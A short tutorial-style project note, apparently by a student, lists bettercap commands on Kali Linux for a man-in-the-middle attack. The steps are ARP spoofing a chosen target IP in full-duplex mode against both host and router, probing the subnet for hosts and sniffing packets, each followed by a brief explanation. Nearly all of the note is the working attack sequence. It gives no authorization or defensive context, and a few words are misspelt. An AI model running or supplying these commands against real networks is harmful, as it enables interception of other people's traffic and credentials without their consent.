**steps of projects**

1. open kali linux
2. go to root terminal
3. type bettercap hit enter.
4. If we want see the modules type help

**STEPS:**

* **Bettercap (enter)**
  + Help
* **Help arp.spoof** 
  + set arp.spoof.fullduplex true (enter)
  + set arp.spoof.target (ip address) (enter)
  + arp.spoof on (enter)
* **net.probe on**
* **net.sniff on**
* AFTER WE MONITOR ALL THE TRAFFIC WE NEED TO STOP THE PROCESS PRESS **CTRL+C**

**EXPLANATION:**

* **Help arp.spoof**

( Keep spoofing selected hosts on the network)

* + **set arp.spoof.fullduplex true** (this commend will help to attack both router and ip address)
  + **set arp.spoof.target (ip address) (enter**)(this commend will help to mention the particular target ip address)
  + **arp.spoof on (enter)**(this commen is use to start the spoofing)
* **Help**

**(**Type help it will show all the modules of bettercap uses)

* **Net.probe on**

(Keep probing for new host on the network by sending dummy udp packets to every possible IP on the subnet)

* **Net.sniff on**

(Sniff packets from the network)